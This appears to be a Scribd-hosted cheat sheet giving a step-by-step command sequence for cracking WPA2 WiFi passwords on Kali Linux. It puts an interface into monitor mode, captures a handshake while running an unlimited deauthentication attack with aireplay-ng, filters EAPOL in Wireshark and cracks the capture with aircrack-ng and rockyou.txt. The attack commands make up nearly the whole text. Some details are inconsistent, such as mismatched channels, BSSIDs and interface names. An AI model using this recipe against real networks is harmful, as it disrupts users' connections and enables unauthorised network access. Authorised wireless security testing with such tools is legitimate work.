Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
33 views2 pages

Hackng

This document provides steps to capture WiFi traffic and crack WPA2 passwords using airodump-ng, aireplay-ng, wireshark, and aircrack-ng on Kali Linux: 1) put the wireless interface into monitor mode, 2) use airodump-ng to find the access point's MAC and channel, 3) launch a deauthentication attack with aireplay-ng while capturing packets with airodump-ng, 4) open the capture file in wireshark to filter for EAPOL messages, and 5) crack the password with aircrack-ng using a wordlist like rockyou.txt.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
33 views2 pages

Hackng

This document provides steps to capture WiFi traffic and crack WPA2 passwords using airodump-ng, aireplay-ng, wireshark, and aircrack-ng on Kali Linux: 1) put the wireless interface into monitor mode, 2) use airodump-ng to find the access point's MAC and channel, 3) launch a deauthentication attack with aireplay-ng while capturing packets with airodump-ng, 4) open the capture file in wireshark to filter for EAPOL messages, and 5) crack the password with aircrack-ng using a wordlist like rockyou.txt.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

!

See version of Kali


cat /etc/os-release
uname -a

! See interfaces
ip addr
iwconfig

!kill processes
sudo airmon-ng check kill

!Start monitor mode


sudo airmon-ng start wlo1

!Verify that monitor mode is used


sudo airmon-ng

!You could also use iwconfig to check that interface is in monitor mode:
iwconfig

! Get the AP's MAC address and channel


sudo airodump-ng wlo1mon

! AP-MAC & channel - you need to select your own here:


ESSID: 84:D8:1B:6F:44:C0
Channel used by AP for SSID: 9

!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 6 --bssid E4:C3:2A:22:D2:41 wlo1mon

!2nd Window - deauth attack


!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a E4:C3:2A:22:D2:41 wlan0mon

!Use Wireshark to open hack file


wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol

!Stop monitor mode


airmon-ng stop wlan0mon

!Crack file with Rock you or another wordlist


!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

================
Previous videos:
================
Kali Installation:

• Kali Linux 2020.3...


WPA2 GPU password cracking:

• Brute force WiFi ...


Wordlists (rockyou):
• rockyou

You might also like